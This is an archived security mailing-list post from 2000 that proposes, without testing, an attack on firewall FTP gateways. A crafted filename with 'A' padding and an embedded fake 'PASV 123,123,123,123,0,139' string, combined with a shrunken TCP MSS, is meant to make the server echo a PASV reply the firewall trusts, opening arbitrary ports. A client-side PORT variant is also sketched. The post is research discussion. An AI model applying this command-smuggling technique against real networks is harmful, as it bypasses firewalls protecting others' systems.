Vulnerability Development mailing list archives
Breaking through FTP ALGs -- is it possible?
From: mikael.olsson () ENTERNET SE (Mikael Olsson)
Date: Tue, 8 Feb 2000 11:10:03 +0100
Hi all, I've been having this idea for a while, but I've never gotten around to testing it to see if it actually works. The low-down of it is fooling a firewall into opening "a TCP port of your choice" against an FTP server. Or, if you're running an evil FTP server, having it open ports against clients accessing the server. There are several "flaws" and assumption in this idea, so it is likely to NOT work with several FTP servers and firewalls. On the other hand, it might work with some :-) Now, for the idea: Assume we're accessing an FTP server that is protected by a firewall of some kind. The firewall is monitoring our command channel, port 21, for "PASV" messages sent by the server. Upon receipt of such messages, it will open a channel to the port number specified in the message. Now, what if we'd be able to send fake "PASV" message to the server, and have it echo them out through the firewall? We'd be able to access arbitrary TCP ports on the FTP server. (23, 139, 6000? :-) Breaking through a stateful inspection FTP ALG ---------------------------------------------- One if the ideas I'm having has to do with stateful inspection firewalls. I'm thinking that most of them don't reassemble the connection completely, but rather trust that the FTP server will send the "PASV" message as the first string in a new packet - this is usually what will happen? What if we "get" a file called AAAAAAA[about 100 A]AAAAPASV 123, 123, 123, 123, 0, 139 where "123, 123, 123, 123" is the public address of the FTP server. It is somewhat likely that the FTP server will send us an error message stating that this file name is illegal. Now, WHAT if we were to decrease the TCP MSS in this connection (easily done) to something like.... 100 bytes? Wouldn't we be able to calculate just how many 'A's we'd have to add to the beginning of the file name until the "PASV" command becomes the first string in the packet following the error message with all the 'A's ? Wouldn't the firewall then obey our fake PASV command that the server just echoed for us? Of course, you might get lots of garbage after the echoed PASV command, like a trailing quote and maybe bits and pieces of the error message. But that might not matter, I think. (Assuming that the firewall simply does something along the lines of sscanf() to get the parameters after having found the "PASV" text in the beginning of the packet). This all assumes that the firewall isn't completely reassembling the stream, but rather looking at the contents of individual packets. This is why I haven't gotten around to testing my idea; you'd have to try it on several different firewalls and see if it has a chance of working. Breaking through a "proxy" FTP ALG ---------------------------------- There's another case here, and that is where the firewall completely reassembles the TCP stream before analyzing it. Call it a "proxy", call it whatever. This is a LOT harder, but it could maybe work with some FTP servers? You'd have to be able to coax the FTP server into sending multiple lines (CRLF terminated) in order to have it look like a real PASV command. You might also have to mimic a legitimate GET request from the client before having the firewall accept the PASV command from the server. As I said, this is nowhere near easy, but I trust someone here will come up with an FTP server that can be coaxed into doing this, and a way to fool the firewall :-) Breaking through to a client ---------------------------- This is not as feasible an attack. You'd have to have an FTP server of your own, and make people connect to it. (As if this can't be done by mailing HTML mail to people containing an IMG SRC pointing to an FTP location?) Anyhow, applying all the theory above with different types of firewall, it ought to be possible to make the client echo bogus "PORT" commands, which the firewall would interpret and result in ports being opened through the firewall. This is nowhere near as likely as the server cases above, I know. It is a lot more likely that you might coax a server into echoing things than fooling a client into echoing things. I'll also leave this idea in your capable hands, people :-) OH, by the way. Another thing about the server cases above. If the firewall accepts any IP address in the PASV command from the server, not just the address of the FTP server itself, you might be able to fool the firewall into opening holes to pretty much any server and port behind it. (Long shot, I know) /Mike
Current thread:
- how to transfer files on napster, (continued)
- how to transfer files on napster Jason Copenhaver (Feb 05)
- Re: how to transfer files on napster Jordan Ritter (Feb 05)
- Re: how to transfer files on napster Blue Boar (Feb 05)
- Re: how to transfer files on napster Seth Georgion (Feb 05)
- Re: how to transfer files on napster whitvamp () MINDLESS COM (Feb 05)
- Re: how to transfer files on napster Jordan Ritter (Feb 05)
- Re: how to transfer files on napster Blue Boar (Feb 07)
- Re: how to transfer files on napster David U. (Feb 07)
- how to transfer files on napster Jason Copenhaver (Feb 05)
- Simple logging utility app Scorpus Kahn (Feb 06)
- Re: Simple logging utility app Erik Parker (Feb 07)
- Breaking through FTP ALGs -- is it possible? Mikael Olsson (Feb 08)
- Re: Possible DHCP DOS attack Sen_Ml Sen_Ml (Feb 04)